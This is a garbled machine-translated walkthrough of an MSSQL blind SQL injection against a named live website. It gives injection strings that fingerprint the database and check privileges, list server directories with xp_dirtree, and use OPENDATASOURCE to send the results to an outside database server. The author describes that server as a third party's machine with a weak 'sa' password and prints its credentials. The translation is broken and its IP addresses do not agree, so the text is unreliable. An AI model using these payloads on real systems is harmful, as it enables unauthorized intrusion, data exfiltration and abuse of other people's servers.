Mssql blind injection practice

Injection point: http://www.bkjia.com/qiuzhiguwen/job.jsp? Num = 47075

1. First, determine whether injection exists. The manual detection method is not mentioned.
 
2. Determine the database type. /* Is used to determine whether it is MYSQL. The addition of -- normal return indicates that the database should be MSSQL. Let's take a look at the details. And (select count (*) from sysobjects)> 0 -- returns normal, so that the database is MSSQL.
 
3. Determine the injection point permission. And 1 = (SELECT IS_SRVROLEMEMBER (sysadmin); -- determine whether the SA permission is used and 1 = (SELECT IS_MEMBER (db_owner )); -- determine whether the database permission is normal. There are two possible injection points. The two types of responses are normal. How can this problem be solved. My method is to add it after the injection point; use model -- to judge, because only users with sa permissions can switch to the model database, and DB has no permissions, so this method can be used to determine. An error is returned, so the injection point should be the DB permission.
 
Iv. Injection of DB permissions, of course, the LOG backup of the column directory is required. Check whether the WEB and MSSQL are a server. What do you think?
First in the local nc-l-p 1433-vv
 
?
1
; Insert % 20 into % 20 opendatasource (
Sqloledb
,
Server = 123.131.000.239; uid = et; pwd = 34234234234; database = sfsdfsdf
). Zm. dbo. zhu % 20 select % 20 name % 20 from % 20master. dbo. sysdatabases --
Execute this injection code at the injection point. Check the status of the NC listening window.
First, use NC to listen to port 1433 locally.
Listening on [any] 1433... 122.000.13.68: inverse host lookup failed: h_errno 11004: NO_DATAconnect to [192.168.1.100] from (UNKNOWN) [122.102.13.68] 1972: NO_DATA
Pinging www.XXX.com.cn [122.000.13.68] viewing the database and WEB site is an IP address
Now we need to list the directories. We don't need tools. This injection point is not shown incorrectly and it is very slow to use tools. I use manual. Manual execution is not necessarily slower than tool execution.
218.26.224.83 sa 123 we need to use an external MSSQL database server, which is a machine with a weak password. First connect to the query analyzer for preparation tools. Create a new database and switch to the database.
Create table WhyTt_Tmp (subdirectory nvarchar (256) NULL, depth tinyint NULL, [file] bit NULL) CREATE a TABLE. All the databases and tables are ready. Now the column directory is started.
Run the injection code on the injection point first.
; Drop table WhyTt_Tmp; create table WhyTt_Tmp (subdirectory nvarchar (256) NULL, depth tinyint NULL, [file] bit NULL); Insert WhyTt_Tmp exec master .. xp_dirtree d:, 1, 1 --
 
This Code creates a table on a remote database and then reads the root directory of disk D to the table.
; Insert into opendatasource (sqloledb, server = 218.31.149.145; uid = sa; pwd = sa; database = cxd). cxd. dbo. whytt_tmp select * from whytt_tmp --
 
Then execute this code at the injection point. This means to import the table content in the remote database to the database we specified. 218.26.224.83 this is the IP address database.
Open the database 218.26.224.83 and check whytt_tmp. Check the content of drive C.
Then find the WEB home directory. LOG backup can be done.